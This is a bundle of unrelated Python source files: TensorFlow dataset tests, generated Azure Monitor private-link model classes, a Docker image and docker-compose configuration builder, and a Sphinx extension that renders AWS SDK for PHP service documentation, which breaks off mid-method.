    """A seeded random op in a map fn varies within a run but repeats
    across iterator re-initializations."""
    iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
                .map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
                .make_initializable_iterator())
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      random_values = []
      with self.assertRaises(errors.OutOfRangeError):
        while True:
          random_values.extend(sess.run(get_next))
      self.assertEqual(10, len(random_values))
      # Values differ within a run -> the op is stateful, not constant.
      self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
      sess.run(init_op)
      random_values_2 = []
      with self.assertRaises(errors.OutOfRangeError):
        while True:
          random_values_2.extend(sess.run(get_next))
      # Randomness is repeatable given same seed
      self.assertAllClose(random_values, random_values_2)

  def testMapDict(self):
    """Map functions may return and consume dicts of tensors."""
    iterator = (dataset_ops.Dataset.range(10)
                .map(lambda x: {"foo": x * 2, "bar": x ** 2})
                .map(lambda d: d["foo"] + d["bar"])
                .make_initializable_iterator())
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      for i in range(10):
        self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)
# Run the test suite when executed as a script.
if __name__ == "__main__":
  test.main()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class PrivateLinkScopesResource(msrest.serialization.Model):
    """An azure resource object.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: Required. Resource location.
    :type location: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    """

    # msrest validation rules: readonly fields are server-populated and
    # ignored on input; 'location' must be supplied by the caller.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'location': {'required': True},
    }

    # Maps Python attribute names to their wire (JSON) keys and msrest types.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(PrivateLinkScopesResource, self).__init__(**kwargs)
        # Read-only attributes start as None; the server fills them in
        # on responses during deserialization.
        self.id = None
        self.name = None
        self.type = None
        # Required: raises KeyError when 'location' is not provided.
        self.location = kwargs['location']
        self.tags = kwargs.get('tags', None)
class AzureMonitorPrivateLinkScope(PrivateLinkScopesResource):
    """An Azure Monitor PrivateLinkScope definition.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: Required. Resource location.
    :type location: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :ivar provisioning_state: Current state of this PrivateLinkScope: whether or not is has been
     provisioned within the resource group it is defined. Users cannot change this value but are
     able to read from it. Values will include Provisioning ,Succeeded, Canceled and Failed.
    :vartype provisioning_state: str
    :ivar private_endpoint_connections: List of private endpoint connections.
    :vartype private_endpoint_connections:
     list[~$(python-base-namespace).v2019_10_17.models.PrivateEndpointConnection]
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"required": True},
        "provisioning_state": {"readonly": True},
        "private_endpoint_connections": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
        "private_endpoint_connections": {"key": "properties.privateEndpointConnections", "type": "[PrivateEndpointConnection]"},
    }

    def __init__(self, **kwargs):
        # Base class consumes 'location' (required) and 'tags'.
        super(AzureMonitorPrivateLinkScope, self).__init__(**kwargs)
        # Both extra properties are read-only and set by the service.
        self.provisioning_state = None
        self.private_endpoint_connections = None
class AzureMonitorPrivateLinkScopeListResult(msrest.serialization.Model):
    """Describes the list of Azure Monitor PrivateLinkScope resources.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. List of Azure Monitor PrivateLinkScope definitions.
    :type value: list[~$(python-base-namespace).v2019_10_17.models.AzureMonitorPrivateLinkScope]
    :param next_link: The URI to get the next set of Azure Monitor PrivateLinkScope definitions if
     too many PrivateLinkScopes where returned in the result set.
    :type next_link: str
    """

    _validation = {
        "value": {"required": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "[AzureMonitorPrivateLinkScope]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(AzureMonitorPrivateLinkScopeListResult, self).__init__(**kwargs)
        self.value = kwargs["value"]  # required
        self.next_link = kwargs.get("next_link")
class ErrorAdditionalInfo(msrest.serialization.Model):
    """The resource management error additional info.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar type: The additional info type.
    :vartype type: str
    :ivar info: The additional info.
    :vartype info: any
    """

    _validation = {
        "type": {"readonly": True},
        "info": {"readonly": True},
    }

    _attribute_map = {
        "type": {"key": "type", "type": "str"},
        "info": {"key": "info", "type": "object"},
    }

    def __init__(self, **kwargs):
        super(ErrorAdditionalInfo, self).__init__(**kwargs)
        # Both fields are read-only; populated from service responses only.
        self.type = None
        self.info = None
class ErrorResponse(msrest.serialization.Model):
    """Describes the format of Error response.

    :param code: Error code.
    :type code: str
    :param message: Error message indicating why the operation failed.
    :type message: str
    """

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(ErrorResponse, self).__init__(**kwargs)
        self.code = kwargs.get("code")
        self.message = kwargs.get("message")
class ErrorResponseCommon(ErrorResponse):
    """The resource management error response.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param code: Error code.
    :type code: str
    :param message: Error message indicating why the operation failed.
    :type message: str
    :ivar details: The error details.
    :vartype details: list[~$(python-base-namespace).v2019_10_17.models.ErrorResponseCommon]
    :ivar additional_info: The error additional info.
    :vartype additional_info:
     list[~$(python-base-namespace).v2019_10_17.models.ErrorAdditionalInfo]
    """

    _validation = {
        "details": {"readonly": True},
        "additional_info": {"readonly": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
        "details": {"key": "details", "type": "[ErrorResponseCommon]"},
        "additional_info": {"key": "additionalInfo", "type": "[ErrorAdditionalInfo]"},
    }

    def __init__(self, **kwargs):
        # Base class consumes 'code' and 'message'.
        super(ErrorResponseCommon, self).__init__(**kwargs)
        # Read-only extensions; populated by the service.
        self.details = None
        self.additional_info = None
class OperationStatus(msrest.serialization.Model):
    """The status of operation.

    :param id: The operation Id.
    :type id: str
    :param name: The operation name.
    :type name: str
    :param start_time: Start time of the job in standard ISO8601 format.
    :type start_time: ~datetime.datetime
    :param end_time: End time of the job in standard ISO8601 format.
    :type end_time: ~datetime.datetime
    :param status: The status of the operation.
    :type status: str
    :param error: The error detail of the operation if any.
    :type error: ~$(python-base-namespace).v2019_10_17.models.ErrorResponseCommon
    """

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "start_time": {"key": "startTime", "type": "iso-8601"},
        "end_time": {"key": "endTime", "type": "iso-8601"},
        "status": {"key": "status", "type": "str"},
        "error": {"key": "error", "type": "ErrorResponseCommon"},
    }

    def __init__(self, **kwargs):
        super(OperationStatus, self).__init__(**kwargs)
        # All properties are optional; default each to None when absent.
        for attr in ("id", "name", "start_time", "end_time", "status", "error"):
            setattr(self, attr, kwargs.get(attr))
class ProxyResource(msrest.serialization.Model):
    """An azure resource object.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(ProxyResource, self).__init__(**kwargs)
        # Every attribute is read-only; the service fills them in.
        self.id = None
        self.name = None
        self.type = None
class PrivateEndpointConnection(ProxyResource):
    """A private endpoint connection.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param private_endpoint: Private endpoint which the connection belongs to.
    :type private_endpoint: ~$(python-base-namespace).v2019_10_17.models.PrivateEndpointProperty
    :param private_link_service_connection_state: Connection state of the private endpoint
     connection.
    :type private_link_service_connection_state:
     ~$(python-base-namespace).v2019_10_17.models.PrivateLinkServiceConnectionStateProperty
    :ivar provisioning_state: State of the private endpoint connection.
    :vartype provisioning_state: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "provisioning_state": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "private_endpoint": {"key": "properties.privateEndpoint", "type": "PrivateEndpointProperty"},
        "private_link_service_connection_state": {"key": "properties.privateLinkServiceConnectionState", "type": "PrivateLinkServiceConnectionStateProperty"},
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(PrivateEndpointConnection, self).__init__(**kwargs)
        self.private_endpoint = kwargs.get("private_endpoint")
        self.private_link_service_connection_state = kwargs.get("private_link_service_connection_state")
        self.provisioning_state = None  # read-only
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
    """A list of private endpoint connections.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar value: Array of results.
    :vartype value: list[~$(python-base-namespace).v2019_10_17.models.PrivateEndpointConnection]
    :ivar next_link: Link to retrieve next page of results.
    :vartype next_link: str
    """

    _validation = {
        "value": {"readonly": True},
        "next_link": {"readonly": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "[PrivateEndpointConnection]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
        # Both fields are read-only paging properties set by the service.
        self.value = None
        self.next_link = None
class PrivateEndpointProperty(msrest.serialization.Model):
    """Private endpoint which the connection belongs to.

    :param id: Resource id of the private endpoint.
    :type id: str
    """

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(PrivateEndpointProperty, self).__init__(**kwargs)
        self.id = kwargs.get("id")
class PrivateLinkResource(ProxyResource):
    """A private link resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :ivar group_id: The private link resource group id.
    :vartype group_id: str
    :ivar required_members: The private link resource required member names.
    :vartype required_members: list[str]
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "group_id": {"readonly": True},
        "required_members": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "group_id": {"key": "properties.groupId", "type": "str"},
        "required_members": {"key": "properties.requiredMembers", "type": "[str]"},
    }

    def __init__(self, **kwargs):
        super(PrivateLinkResource, self).__init__(**kwargs)
        # Read-only; populated from the service's properties bag.
        self.group_id = None
        self.required_members = None
class PrivateLinkResourceListResult(msrest.serialization.Model):
    """A list of private link resources.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar value: Array of results.
    :vartype value: list[~$(python-base-namespace).v2019_10_17.models.PrivateLinkResource]
    :ivar next_link: Link to retrieve next page of results.
    :vartype next_link: str
    """

    _validation = {
        "value": {"readonly": True},
        "next_link": {"readonly": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "[PrivateLinkResource]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(PrivateLinkResourceListResult, self).__init__(**kwargs)
        # Both fields are read-only paging properties set by the service.
        self.value = None
        self.next_link = None
class PrivateLinkServiceConnectionStateProperty(msrest.serialization.Model):
    """State of the private endpoint connection.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param status: Required. The private link service connection status.
    :type status: str
    :param description: Required. The private link service connection description.
    :type description: str
    :ivar actions_required: The actions required for private link service connection.
    :vartype actions_required: str
    """

    _validation = {
        "status": {"required": True},
        "description": {"required": True},
        "actions_required": {"readonly": True},
    }

    _attribute_map = {
        "status": {"key": "status", "type": "str"},
        "description": {"key": "description", "type": "str"},
        "actions_required": {"key": "actionsRequired", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(PrivateLinkServiceConnectionStateProperty, self).__init__(**kwargs)
        self.status = kwargs["status"]            # required
        self.description = kwargs["description"]  # required
        self.actions_required = None              # read-only
class ScopedResource(ProxyResource):
    """A private link scoped resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource Id.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param linked_resource_id: The resource id of the scoped Azure monitor resource.
    :type linked_resource_id: str
    :ivar provisioning_state: State of the private endpoint connection.
    :vartype provisioning_state: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "provisioning_state": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "linked_resource_id": {"key": "properties.linkedResourceId", "type": "str"},
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(ScopedResource, self).__init__(**kwargs)
        self.linked_resource_id = kwargs.get("linked_resource_id")
        self.provisioning_state = None  # read-only
class ScopedResourceListResult(msrest.serialization.Model):
    """A list of scoped resources in a private link scope.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar value: Array of results.
    :vartype value: list[~$(python-base-namespace).v2019_10_17.models.ScopedResource]
    :ivar next_link: Link to retrieve next page of results.
    :vartype next_link: str
    """

    _validation = {
        "value": {"readonly": True},
        "next_link": {"readonly": True},
    }

    _attribute_map = {
        "value": {"key": "value", "type": "[ScopedResource]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super(ScopedResourceListResult, self).__init__(**kwargs)
        # Both fields are read-only paging properties set by the service.
        self.value = None
        self.next_link = None
class TagsResource(msrest.serialization.Model):
    """A container holding only the Tags for a resource, allowing the user to update the tags on a PrivateLinkScope instance.

    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    """

    _attribute_map = {
        "tags": {"key": "tags", "type": "{str}"},
    }

    def __init__(self, **kwargs):
        super(TagsResource, self).__init__(**kwargs)
        self.tags = kwargs.get("tags")
| |
"""Docker module
This module includes classes for docker
"""
import subprocess
import yaml
class DockerImage(object):
    """A single Docker image identified by its name.

    Attributes:
        image_name: name of the image
    """

    def __init__(self, image_name):
        """Create a new instance for *image_name*."""
        self.__image_name = image_name

    def export_image(self, output_filename):
        """Exports the image to the given filename

        Args:
            output_filename: filename for the output of the image
        """
        # Pull the image from Docker Hub first, then save it to a tar archive.
        # check_call raises CalledProcessError if either docker command fails.
        for command in (
                ["docker", "pull", self.__image_name],
                ["docker", "save", "-o", output_filename, self.__image_name]):
            subprocess.check_call(command)
class DockerComposeConfig(object):
    """Builder for a docker-compose.yml configuration.

    Collects DockerServiceConfig and DockerNetworkConfig objects plus named
    volumes, and renders everything as a docker-compose YAML document.

    Usage:
        config = DockerComposeConfig()
        config.add_service(docker_service_1)
        config.add_service(docker_service_2)
        config.add_network(docker_network_1)
        config.add_volumes(["volume_1"])
        config.create_yaml_output()
    """

    def __init__(self):
        """Create a new, empty configuration."""
        self.__docker_services = []
        self.__docker_networks = []
        self.__docker_volumes = []

    def add_service(self, docker_service_config):
        """Adds a new DockerServiceConfig object

        Args:
            docker_service_config: the new DockerServiceConfig object

        Returns:
            None
        """
        self.__docker_services.append(docker_service_config)

    def add_network(self, docker_network_config):
        """Adds a new DockerNetworkConfig object

        Args:
            docker_network_config: the new DockerNetworkConfig object

        Returns:
            None
        """
        self.__docker_networks.append(docker_network_config)

    def add_volumes(self, volumenames):
        """Adds a list of named volumes to declare (duplicates are dropped)

        Args:
            volumenames: list with names of named volumes

        Returns:
            None
        """
        # Union with the existing names; order is not preserved (set-based),
        # matching the original behavior.
        merged = set(self.__docker_volumes)
        merged.update(volumenames)
        self.__docker_volumes = list(merged)

    def create_yaml_output(self):
        """Creates YAML output for docker-compose.yml

        Returns:
            String with YAML output for docker-compose.yml
        """
        yaml_data = {
            "version": "2.1",
            "services": dict(
                (svc.get_name(), svc.get_config_dict())
                for svc in self.__docker_services),
            "networks": dict(
                (net.get_name(), net.get_config_dict())
                for net in self.__docker_networks),
            # Named volumes are declared with empty (default) options.
            "volumes": dict((vol, {}) for vol in self.__docker_volumes),
        }
        return yaml.safe_dump(yaml_data, default_flow_style=False)
class DockerServiceConfig(object):
    """Configuration of a single docker-compose service.

    Attributes:
        name: name of the container
    """

    def __init__(self, name):
        """Initialize with the service name and compose defaults."""
        self.__name = name
        self.__image = ""
        self.__dependencies = []
        self.__volumes = []
        self.__ports = []
        self.__environment = {}
        self.__buildargs = {}
        self.__privileged = False
        self.__restart_policy = "no"   # compose default
        self.__build = None            # optional build context path
        self.__network_mode = None     # optional network_mode override

    def get_name(self):
        """Returns the container name"""
        return self.__name

    def get_image(self):
        """Returns the image name"""
        return self.__image

    def set_image(self, image):
        """Sets the image of the container

        Args:
            image: the image name of the container
        """
        self.__image = image

    def set_privileged(self, privileged):
        """Sets if the container is privileged

        Args:
            privileged: boolean flag, if it is a privileged container
        """
        self.__privileged = privileged

    def set_restart_policy(self, policy):
        """Sets the containers restart policy

        Args:
            policy: String with restart policy
        """
        self.__restart_policy = policy

    def add_dependency(self, target):
        """Adds a dependency to another container

        Args:
            target: target container name
        """
        self.__dependencies.append(target)

    def add_volume(self, volume_definition):
        """Adds a volume definition.

        Args:
            volume_definition: Docker volume definition
        """
        self.__volumes.append(volume_definition)

    def add_port(self, port_definition):
        """Adds a port definition.

        Args:
            port_definition: Docker port definition
        """
        self.__ports.append(port_definition)

    def add_environment(self, env_variable, env_value):
        """Adds an environment variable

        Args:
            env_variable: name of the environment variable
            env_value: value of the environment variable
        """
        self.__environment[env_variable] = env_value

    def add_buildarg(self, arg, value):
        """Adds a build argument

        Args:
            arg: name of the build argument
            value: value of the build argument
        """
        self.__buildargs[arg] = value

    def set_build_path(self, build_path):
        """Sets the build option with the given path

        Args:
            build_path: path to Dockerfile
        """
        self.__build = build_path

    def set_network_mode(self, network_mode):
        """Sets the network_mode

        Args:
            network_mode: Docker Compose network mode option
        """
        self.__network_mode = network_mode

    def get_config_dict(self):
        """Return the service configuration as a dict for docker-compose."""
        output = {
            "image": self.__image,
            "depends_on": self.__dependencies,
            "privileged": self.__privileged,
            "restart": self.__restart_policy,
            "environment": self.__environment,
            "volumes": self.__volumes,
            "ports": self.__ports,
        }
        # "build" (and its "args") only appear when a build path is set;
        # build args without a build path are silently ignored, as before.
        if self.__build:
            build_section = {"context": self.__build}
            if self.__buildargs:
                build_section["args"] = self.__buildargs
            output["build"] = build_section
        if self.__network_mode:
            output["network_mode"] = self.__network_mode
        return output
class DockerNetworkConfig(object):
    """Configuration of a single docker-compose network."""

    def __init__(self, name):
        """Initialize with the network name; all options start unset."""
        self.__name = name
        self.__ipam_config = []
        self.__ipv6_enable = None
        self.__driver = None
        self.__driver_opts = {}

    def get_name(self):
        """Returns the network name."""
        return self.__name

    def add_ip_config(self, network, gateway=None):
        """Append an IPAM subnet entry (with an optional gateway)."""
        entry = {"subnet": network}
        if gateway is not None:
            entry["gateway"] = gateway
        self.__ipam_config.append(entry)

    def set_ipv6_enable(self, ipv6_enable):
        """Enable/disable IPv6 for the network."""
        self.__ipv6_enable = ipv6_enable

    def set_driver(self, driver):
        """Set the network driver."""
        self.__driver = driver

    def set_driver_opts(self, driver_opts):
        """Set the driver options dict."""
        self.__driver_opts = driver_opts

    def get_config_dict(self):
        """Return the network configuration as a dict for docker-compose.

        Only options that were actually set are emitted.
        """
        output = {}
        if self.__ipv6_enable:
            output["enable_ipv6"] = self.__ipv6_enable
        if self.__driver:
            output["driver"] = self.__driver
        if self.__driver_opts:
            output["driver_opts"] = self.__driver_opts
        if self.__ipam_config:
            output["ipam"] = {"config": self.__ipam_config}
        return output
| |
import os, re, subprocess, json, collections
from sphinx.addnodes import toctree
from docutils import io, nodes, statemachine, utils
from docutils.parsers.rst import Directive
from jinja2 import Environment, PackageLoader
# Maintain a cache of previously loaded examples
example_cache = {}
# Maintain a cache of previously loaded service descriptions
description_cache = {}
def setup(app):
    """
    Primary extension point for Sphinx.

    see: http://sphinx.pocoo.org/ext/appapi.html
    """
    from sphinx.application import Sphinx
    # Bail out quietly when called with something that is not a Sphinx app.
    if not isinstance(app, Sphinx):
        return
    app.add_role('regions', regions_role)
    for directive_name, directive_class in (
            ('service', ServiceIntro),
            ('apiref', ServiceApiRef),
            ('indexlinks', ServiceIndexLinks),
            ('example', ExampleDirective)):
        app.add_directive(directive_name, directive_class)
def regions_role(name, rawtext, text, lineno, inliner, options={}, content={}):
    """Inserts a list of regions available to a service name

    Returns 2 part tuple containing list of nodes to insert into the
    document and a list of system messages. Both are allowed to be
    empty.

    :param name: The role name used in the document.
    :param rawtext: The entire markup snippet, with role.
    :param text: The text marked with the role.
    :param lineno: The line number where rawtext appears in the input.
    :param inliner: The inliner instance that called us.
    :param options: Directive options for customization.
    :param content: The directive content for customization.
    """
    # NOTE: mutable default args follow the docutils role convention; they
    # are never mutated here.
    try:
        service_name = str(text)
        if not service_name:
            raise ValueError
        app = inliner.document.settings.env.app
        node = make_regions_node(rawtext, app, str(service_name), options)
    except ValueError:
        # Covers both an empty role body and an unknown service name
        # (make_regions_node raises ValueError for the latter).
        msg = inliner.reporter.error(
            'The service name "%s" is invalid; ' % text, line=lineno)
        prb = inliner.problematic(rawtext, rawtext, msg)
        return [prb], [msg]
    return [node], []
def get_regions(service_name):
    """Get the regions for a service by name

    Returns a list of regions

    :param service_name: Retrieve regions for this service by name
    """
    description = load_service_description(service_name)
    return description['regions'].keys()
def make_regions_node(rawtext, app, service_name, options):
    """Create a text node listing the regions for a service name

    :param rawtext: Text being replaced with the list node.
    :param app: Sphinx application context
    :param service_name: Service name
    :param options: Options dictionary passed to role func.
    """
    # rawtext/app/options are unused but kept for the role-helper signature.
    return nodes.Text(", ".join(get_regions(service_name)))
class ServiceDescription():
    """
    Loads the service description for a given source file
    """

    def __init__(self, service):
        # Resolve and load the description eagerly at construction time.
        self.service_name = service
        self.description = self.load_description(self.determine_filename())

    def determine_filename(self):
        """Determines the filename to load for a service"""
        # Determine the path to the aws-config
        # NOTE(review): path is relative to the process cwd — assumes the
        # build runs from the docs directory; confirm.
        path = os.path.abspath("../src/Aws/Common/Resources/aws-config.php")
        self.config = self.__load_php(path)
        # Iterate over the loaded dictionary and see if a matching service exists
        for key in self.config["services"]:
            alias = self.config["services"][key].get("alias", "")
            if key == self.service_name or alias == self.service_name:
                break
        else:
            # for/else: only reached when no break occurred above.
            raise ValueError("No service matches %s" % (self.service_name))
        # Determine the name of the client class to load
        class_path = self.config["services"][key]["class"].replace("\\", "/")
        client_path = os.path.abspath("../src/" + class_path + ".php")
        contents = open(client_path, 'r').read()
        # Determine the current version of the client (look at the LATEST_API_VERSION constant value)
        version = re.search("LATEST_API_VERSION = '(.+)'", contents).groups(0)[0]
        # Determine the name of the service description used by the client
        matches = re.search("__DIR__ \. '/Resources/(.+)\.php'", contents)
        # The captured name is a printf-style template; interpolate the version.
        # NOTE(review): assumes it contains exactly one '%s' — confirm against
        # the PHP client sources.
        description = matches.groups(0)[0] % (version)
        # Strip the filename of the client and determine the description path
        service_path = "/".join(client_path.split(os.sep)[0:-1])
        service_path += "/Resources/" + description + ".php"
        return service_path

    def load_description(self, path):
        """Loads a service description and normalizes it

        :param path: Path to a service description to load
        """
        description = self.__load_php(path)
        # Guarantee a 'regions' key so callers can index it unconditionally.
        if 'regions' not in description:
            description['regions'] = {}
        return description

    def __load_php(self, path):
        """Load a PHP script that returns an array using JSON

        :param path: Path to the script to load
        """
        path = os.path.abspath(path)
        # Make command to each environment Linux/Mac and Windows
        # (quoting rules differ between cmd.exe and POSIX shells).
        if os.name == 'nt':
            sh = 'php -r \"$c = include \'' + path + '\'; echo json_encode($c);\"'
        else:
            sh = 'php -r \'$c = include "' + path + '"; echo json_encode($c);\''
        # Runs the `php` binary through the shell; `path` comes from the local
        # repository, not untrusted input.
        loaded = subprocess.check_output(sh, shell=True)
        return json.loads(loaded)

    def __getitem__(self, i):
        """Allows access to the service description items via the class"""
        # Returns None (rather than raising) for missing keys, via dict.get.
        return self.description.get(i)
def load_service_description(name):
    """Return the (cached) ServiceDescription for *name*, loading it once."""
    try:
        return description_cache[name]
    except KeyError:
        description_cache[name] = ServiceDescription(name)
        return description_cache[name]
class ServiceDescriptionDirective(Directive):
    """
    Base class for directives that use information from service descriptions
    """

    required_arguments = 1
    optional_arguments = 1
    final_argument_whitespace = True

    def run(self):
        # Optional second argument selects a specific API version.
        api_version = self.arguments[1].strip() if len(self.arguments) == 2 else ""
        service_name = self.arguments[0].strip()
        service_description = load_service_description(service_name)
        # Subclasses implement generate_rst(); inject its output into the
        # current document via the state machine.
        rawtext = self.generate_rst(service_description, api_version)
        include_lines = statemachine.string2lines(
            rawtext, 4, convert_whitespace=1)
        self.state_machine.insert_input(
            include_lines, os.path.abspath(__file__))
        return []

    def get_service_doc_url(self, namespace):
        """Determine the documentation link for a service"""
        namespace = namespace.lower()
        # STS docs live under the IAM documentation hub.
        if namespace == "sts":
            return "http://aws.amazon.com/documentation/iam/"
        return "http://aws.amazon.com/documentation/" + namespace

    def get_api_ref_url(self, namespace):
        """Determine the PHP API documentation link for a service"""
        return ("http://docs.aws.amazon.com/aws-sdk-php/latest/class-Aws."
                + namespace + "." + namespace + "Client.html")

    def get_locator_name(self, name):
        """Determine the service locator name for an endpoint"""
        return name
class ServiceIntro(ServiceDescriptionDirective):
    """
    Creates a service introduction to inject into a document
    """

    def generate_rst(self, d, api_version):
        rawtext = ""
        scalar = {}
        # Collect the simple string values from the description and emit a
        # reST substitution for each top-level scalar.
        for key in d.description:
            if isinstance(d[key], (str, unicode)):
                scalar[key] = d[key]
                rawtext += ".. |%s| replace:: %s\n\n" % (key, scalar[key])
        # Determine the doc URL
        docs = self.get_service_doc_url(d["namespace"])
        # Determine the "namespace" suffix used for linking to API docs.
        apiVersionSuffix = "_" + api_version.replace("-", "_") if api_version else ""
        env = Environment(loader=PackageLoader('aws', 'templates'))
        template = env.get_template("client_intro")
        rawtext += template.render(
            scalar,
            regions=get_regions(d["namespace"]),
            doc_url=docs,
            specifiedApiVersion=api_version,
            apiVersionSuffix=apiVersionSuffix)
        return rawtext
class ServiceApiRef(ServiceDescriptionDirective):
    """
    Renders the API reference section for a service
    """

    def generate_rst(self, d, api_version):
        rawtext = ""
        scalar = {}
        # Sort the operations by key so the reference is deterministic.
        operations = collections.OrderedDict(
            sorted(d.description['operations'].items()))
        # Collect the simple string values and emit a reST substitution
        # for each top-level scalar.
        for key in d.description:
            if isinstance(d[key], (str, unicode)):
                scalar[key] = d[key]
                rawtext += ".. |%s| replace:: %s\n\n" % (key, scalar[key])
        # Attach the camelCase "magic method" name to each operation.
        for key in operations:
            operations[key]['magicMethod'] = key[0].lower() + key[1:]
        # Replace the operations mapping with the ordered version in place.
        d.description['operations'] = operations
        # Determine the "namespace" suffix used for linking to API docs.
        apiVersionSuffix = "_" + api_version.replace("-", "_") if api_version else ""
        env = Environment(loader=PackageLoader('aws', 'templates'))
        template = env.get_template("api_reference")
        rawtext += template.render(
            scalar,
            description=d.description,
            regions=get_regions(d["namespace"]),
            apiVersionSuffix=apiVersionSuffix)
        return rawtext
class ServiceIndexLinks(ServiceDescriptionDirective):
    """
    Renders the index links for a service
    """

    def generate_rst(self, service_description, api_version):
        d = service_description.description
        # Prefer the short abbreviation when the description provides one.
        service_name = d.get("serviceAbbreviation", d["serviceFullName"])
        lines = [
            "* :doc:`Using the %s PHP client <service-%s>`"
            % (service_name, d["namespace"].lower()),
            "* `PHP API reference <%s>`_" % self.get_api_ref_url(d["namespace"]),
        ]
        #lines.append("* `General service documentation for " + service_name + " <" + self.get_service_doc_url(d["namespace"]) + ">`_")
        return "\n".join(lines) + "\n"
class ExampleDirective(Directive):
    """
    Inserts a formatted PHPUnit example into the source
    """

    # Directive configuration
    required_arguments = 2
    optional_arguments = 0
    final_argument_whitespace = True

    def run(self):
        # Sentinel lines used by the scanner below; matched with exact string
        # equality, so the source indentation must be exactly four spaces.
